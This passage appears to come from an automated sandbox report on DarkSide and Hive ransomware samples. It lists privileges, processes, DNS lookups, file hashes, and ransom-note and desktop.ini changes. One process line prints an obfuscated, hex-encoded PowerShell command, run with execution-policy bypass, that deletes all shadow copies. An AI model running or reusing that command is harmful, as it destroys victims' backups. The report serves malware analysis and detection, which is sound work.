Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/4052-0-0x0000000000910000-0x0000000000920000-memory.dmp

memory/3124-1-0x00007FFB937C3000-0x00007FFB937C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmzo3zz.2x1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3124-8-0x000002BEB2E10000-0x000002BEB2E32000-memory.dmp

memory/3124-12-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp

memory/3124-15-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp

C:\Users\README.6f83c4b2.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/4052-26-0x0000000000910000-0x0000000000920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7bd0d74ff0bb98e8751cae71652ed62e
SHA1 caff8e2a964e2900fbe38a3f243499c126b3d4e4
SHA256 64c6fad7f8c73c79d9c041118f7fef91738366bc17ff7f8cee2876dacbc25113
SHA512 df72f1960f1fddf04497e38afee3a40ab8ed7f9fd9d701b83ef2e1cbd63530447f596297acbc215abef7ae08cdd381dc6dcf1e1f5ffdbfa25d82ab357bf68892

memory/4052-54-0x0000000000910000-0x0000000000920000-memory.dmp

memory/4052-230-0x0000000000910000-0x0000000000920000-memory.dmp

memory/4052-237-0x0000000000910000-0x0000000000920000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win7-20240704-en

Max time kernel

1563s

Max time network

1690s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Boot or Logon Autostart Execution: Print Processors

persistence
Description Indicator Process Target
File created C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.-uYcD1toMB6z-bE3g_VWOQ7EUj-WNiccrn6Rqkkqn3Q.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E9P9LRO9\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OJBRRE9R\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FGBCC7A8\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JVMDVGRW\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G4UA8T7D\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FH198YO1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XLI5Q0EH\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in System32 directory

Description Indicator Process Target
